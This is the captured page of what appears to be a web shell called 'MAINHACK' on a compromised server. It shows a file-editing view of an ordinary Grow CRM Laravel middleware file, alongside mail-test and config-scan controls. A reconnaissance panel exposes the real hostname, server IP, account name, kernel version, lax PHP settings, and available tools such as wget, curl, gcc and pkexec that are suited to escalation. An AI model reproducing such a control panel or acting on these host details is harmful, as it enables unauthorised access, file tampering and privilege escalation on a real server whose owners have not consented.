[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Destroy.php
<?php /** -------------------------------------------------------------------------------- * This middleware class handles [destroy] precheck processes for template * * @package Grow CRM * @author NextLoop *----------------------------------------------------------------------------------*/ namespace App\Http\Middleware\Subscriptions; use Closure; use Log; class Destroy { /** * This 'bulk actions' middleware does the following * 1. If the request was for a sinle item * - single item actions must have a query string '?id=123' * - this id will be merged into the expected 'ids' request array (just as if it was a bulk request) * 2. loop through all the 'ids' that are in the post request * * HTML for the checkbox is expected to be in this format: * <input type="checkbox" name="ids[{{ $subscription->subscription_id }}]" * * @param \Illuminate\Http\Request $request * @param \Closure $next * @return mixed */ public function handle($request, Closure $next) { //validate module status if (!config('visibility.modules.subscriptions')) { abort(404, __('lang.the_requested_service_not_found')); return $next($request); } //for a single item request - merge into an $ids[x] array and set as if checkox is selected (on) if (is_numeric($request->route('subscription'))) { $ids[$request->route('subscription')] = 'on'; request()->merge([ 'ids' => $ids, ]); } //loop through each subscription and check permissions if (is_array(request('ids'))) { //validate each item in the list exists foreach (request('ids') as $id => $value) { //only checked items if ($value == 'on') { //validate if (!$subscription = \App\Models\Subscription::Where('subscription_id', $id)->first()) { abort(409, __('lang.one_of_the_selected_items_nolonger_exists')); } } } //permission: does user have permission edit subscriptions if (auth()->user()->is_team) { if (auth()->user()->role->role_subscriptions < 3) { abort(403, __('lang.permission_denied_for_this_item') . " - #$id"); } } } else { //no items were passed with this request Log::error("no items were sent with this request", ['process' => '[permissions][subscriptions][action-destroy]', 'ref' => config('app.debug_ref'), 'function' => __function__, 'file' => basename(__FILE__), 'line' => __line__, 'path' => __file__, 'subscription id' => $subscription_id ?? '']); abort(409); } //all is on - passed return $next($request); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002